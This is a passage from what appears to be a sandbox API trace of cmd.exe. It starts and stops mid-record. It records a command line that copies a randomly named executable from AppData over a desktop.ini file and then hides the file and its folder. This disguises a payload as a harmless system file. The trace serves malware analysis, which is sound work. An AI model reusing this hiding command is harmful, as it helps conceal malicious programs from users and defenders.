lpData=0x12e788*=0x9, lpcbData=0x12e780*=0x1000) returned 0x2 [0207.484] RegCloseKey (hKey=0x40) returned 0x0 [0207.484] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a9 [0207.484] srand (_Seed=0x5b8863a9) [0207.484] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\"" [0207.484] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\"" [0207.484] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0207.485] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x231c10, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0207.485] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0207.485] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0207.485] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, 
nSize=0x2000 | out: lpBuffer="") returned 0x0 [0207.485] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0207.485] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0207.485] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0207.485] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0207.485] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0207.485] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0207.485] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0207.485] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0207.485] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0207.485] GetEnvironmentStringsW () returned 0x232600* [0207.486] FreeEnvironmentStringsW (penv=0x232600) returned 1 [0207.486] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0207.486] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0207.486] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0207.486] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0207.486] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0207.486] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0207.486] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0207.486] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0207.486] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0207.486] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0207.486] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12f548 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0207.486] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x12f548, lpFilePart=0x12f544 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", 
lpFilePart=0x12f544*="Desktop") returned 0x18 [0207.486] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0207.486] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f2c4 | out: lpFindFileData=0x12f2c4) returned 0x230c90 [0207.486] FindClose (in: hFindFile=0x230c90 | out: hFindFile=0x230c90) returned 1 [0207.487] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x12f2c4 | out: lpFindFileData=0x12f2c4) returned 0x230c90 [0207.487] FindClose (in: hFindFile=0x230c90 | out: hFindFile=0x230c90) returned 1 [0207.487] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x12f2c4 | out: lpFindFileData=0x12f2c4) returned 0x230c90 [0207.487] FindClose (in: hFindFile=0x230c90 | out: hFindFile=0x230c90) returned 1 [0207.487] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0207.487] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0207.487] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0207.487] GetEnvironmentStringsW () returned 0x2304b0* [0207.487] FreeEnvironmentStringsW (penv=0x2304b0) returned 1 [0207.487] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0207.488] GetConsoleOutputCP () returned 0x1b5 [0207.488] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0207.488] GetUserDefaultLCID () returned 0x409 [0207.488] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0207.488] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f688, cchData=128 | out: lpLCData="0") returned 2 [0207.489] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12f688, cchData=128 | out: 
lpLCData="0") returned 2 [0207.489] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12f688, cchData=128 | out: lpLCData="1") returned 2 [0207.489] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0207.489] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0207.489] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0207.489] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0207.489] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0207.489] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0207.489] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0207.489] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0207.489] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0207.489] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0207.489] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0207.490] GetConsoleTitleW (in: lpConsoleTitle=0x220ad0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0207.490] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0207.490] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0207.491] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0207.491] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0207.492] _wcsicmp 
(_String1="attrib", _String2=")") returned 56 [0207.492] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0207.492] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0207.492] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0207.492] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0207.492] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0207.492] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0207.494] _wcsicmp (_String1="del", _String2=")") returned 59 [0207.494] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0207.494] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0207.494] _wcsicmp (_String1="IF", _String2="del") returned 5 [0207.494] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0207.494] _wcsicmp (_String1="REM", _String2="del") returned 14 [0207.494] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0207.496] _wcsicmp (_String1="type", _String2=")") returned 75 [0207.496] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0207.496] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0207.496] _wcsicmp (_String1="IF", _String2="type") returned -11 [0207.496] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0207.496] _wcsicmp (_String1="REM", _String2="type") returned -2 [0207.496] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0207.599] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0207.599] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0207.606] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0207.607] FindClose (in: hFindFile=0x232560 | out: hFindFile=0x232560) returned 1 [0207.607] FindClose (in: hFindFile=0x232560 | out: 
hFindFile=0x232560) returned 1 [0207.607] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0207.608] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0207.608] GetConsoleTitleW (in: lpConsoleTitle=0x12f0b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0207.608] InitializeProcThreadAttributeList (in: lpAttributeList=0x12ef38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x12f000 | out: lpAttributeList=0x12ef38, lpSize=0x12f000) returned 1 [0207.608] UpdateProcThreadAttribute (in: lpAttributeList=0x12ef38, dwFlags=0x0, Attribute=0x60001, lpValue=0x12eff8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x12ef38, lpPreviousValue=0x0) returned 1 [0207.608] GetStartupInfoW (in: lpStartupInfo=0x12eef4 | out: lpStartupInfo=0x12eef4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0207.608] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0207.609] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x12ef94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12efe0 | out: lpCommandLine="attrib -r -s -h 
\"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" ", lpProcessInformation=0x12efe0*(hProcess=0x50, hThread=0x4c, dwProcessId=0x95c, dwThreadId=0xe00)) returned 1 [0207.613] CloseHandle (hObject=0x4c) returned 1 [0207.613] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0207.613] GetEnvironmentStringsW () returned 0x2309e0* [0207.613] FreeEnvironmentStringsW (penv=0x2309e0) returned 1 [0207.613] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0207.700] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x12eed4 | out: lpExitCode=0x12eed4*=0x0) returned 1 [0207.700] CloseHandle (hObject=0x50) returned 1 [0207.700] _vsnwprintf (in: _Buffer=0x12f01c, _BufferCount=0x13, _Format="%08X", _ArgList=0x12eee0 | out: _Buffer="00000000") returned 8 [0207.700] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0207.700] GetEnvironmentStringsW () returned 0x2325b0* [0207.700] FreeEnvironmentStringsW (penv=0x2325b0) returned 1 [0207.700] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0207.700] GetEnvironmentStringsW () returned 0x2325b0* [0207.700] FreeEnvironmentStringsW (penv=0x2325b0) returned 1 [0207.700] DeleteProcThreadAttributeList (in: lpAttributeList=0x12ef38 | out: lpAttributeList=0x12ef38) [0207.700] GetConsoleTitleW (in: lpConsoleTitle=0x12f2b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0207.701] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini" (normalized: "c:\\users\\alluse~1\\packag~1\\{f325f~1\\desktop.ini")) returned 0xffffffff [0207.701] GetLastError () returned 0x2 [0207.701] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1" (normalized: "c:\\users\\alluse~1\\packag~1\\{f325f~1")) returned 0x10 [0207.701] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0207.701] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0207.701] 
GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini" (normalized: "c:\\users\\alluse~1\\packag~1\\{f325f~1\\desktop.ini")) returned 0xffffffff [0207.701] GetLastError () returned 0x2 [0207.702] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x12ed64 | out: lpConsoleScreenBufferInfo=0x12ed64) returned 1 [0207.702] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0207.703] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0207.703] GetConsoleTitleW (in: lpConsoleTitle=0x12f254, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0207.703] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0207.703] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.704] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.704] GetFileType (hFile=0x50) returned 0x1 [0207.704] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.705] GetFileType (hFile=0x50) returned 0x1 [0207.705] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.705] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.706] GetFileType (hFile=0x50) returned 0x1 [0207.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.706] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, 
lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.706] GetFileType (hFile=0x50) returned 0x1 [0207.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.706] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.706] GetFileType (hFile=0x50) returned 0x1 [0207.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.706] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.706] GetFileType (hFile=0x50) returned 0x1 [0207.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.706] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.706] GetFileType (hFile=0x50) returned 0x1 [0207.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.706] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.706] GetFileType (hFile=0x50) returned 0x1 [0207.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.706] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: 
lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.707] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.707] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.707] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.707] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.707] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.707] GetFileType (hFile=0x50) returned 0x1 [0207.707] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.707] GetFileType (hFile=0x50) returned 0x1 [0207.707] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.707] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.707] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.707] GetFileType (hFile=0x50) returned 0x1 [0207.707] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.707] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.707] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.707] GetFileType (hFile=0x50) returned 0x1 [0207.707] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.707] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.707] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.707] GetFileType (hFile=0x50) returned 0x1 [0207.707] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0207.707] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.708] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.708] GetFileType (hFile=0x50) returned 0x1 [0207.708] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.708] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.708] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.708] GetFileType (hFile=0x50) returned 0x1 [0207.708] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.708] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.708] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.708] GetFileType (hFile=0x50) returned 0x1 [0207.708] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.708] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.708] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.708] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.708] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.708] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.708] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.708] 
GetFileType (hFile=0x50) returned 0x1 [0207.708] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.708] GetFileType (hFile=0x50) returned 0x1 [0207.708] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.708] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.708] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.708] GetFileType (hFile=0x50) returned 0x1 [0207.708] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.708] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.708] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.708] GetFileType (hFile=0x50) returned 0x1 [0207.708] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.708] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.709] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.709] GetFileType (hFile=0x50) returned 0x1 [0207.709] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.709] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.709] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.709] GetFileType (hFile=0x50) returned 0x1 [0207.709] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.709] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 
[0207.709] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.709] GetFileType (hFile=0x50) returned 0x1 [0207.709] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.709] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.709] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.709] GetFileType (hFile=0x50) returned 0x1 [0207.709] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.709] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.709] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.709] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.709] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.709] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, 